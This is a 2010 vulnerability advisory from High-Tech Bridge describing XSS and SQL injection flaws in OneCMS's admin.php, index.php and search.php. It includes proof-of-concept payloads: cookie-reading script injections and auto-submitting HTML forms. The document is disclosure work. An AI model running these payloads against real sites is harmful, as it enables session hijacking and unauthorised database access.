Multiple Vulnerabilities in OneCMS

2010-06-10T00:00:00
ID HTB22432
Type htbridge
Reporter High-Tech Bridge
Modified 2010-06-10T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OneCMS which could be exploited to perform cross-site scripting and SQL injection attacks.

1) Cross-site scripting (XSS) vulnerabilities in OneCMS
The vulnerability exists due to input sanitation error in the "cat" and "Short1" parameters in admin/admin.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is login-in and has access to administrative interface.
Exploitation examples:
http://example.com/admin/admin.php?cat=cheats%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C/script% 3E
<form action="http://example.com/admin/admin.php?view=manage&edit=2" method="post" name="main" >
<input type="hidden" name="id[]" value="1" />
<input type="hidden" name="cat_1" value="news" />
<input type="hidden" name="name_1" value="OneCMS News title" />
<input type="hidden" name="lev_1" value="No" />
<input type="hidden" name="Full1" value="news full text" />
<input type="hidden" name="systems1" value="" />
<input type="hidden" name="games1" value="" />
<input type="hidden" name="Short1" value='short"><script>alert(document.cookie)</script>' />
<input type="hidden" name="image1" value="" />
<input type="hidden" name="Add" value="Submit Changes" />
</form>
<script>
document.main.submit();
</script>

2) SQL injection vulnerabilities in OneCMS
2.1 The vulnerability exists due to input sanitation error in the "id" parameter in index.php. A remote attacker can send a specially crafted HTTP GET request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://host/index.php?load=af&view=click&id=3'+any sql

2.2 The vulnerability exists due to input sanitation error in the "search" parameter in search.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
<form action="http://example.com/search.php?view=forums" method="post" name="main" >
<input type="hidden" name="search" value="1+any sql" />
</form>
<script>
document.main.submit();
</script>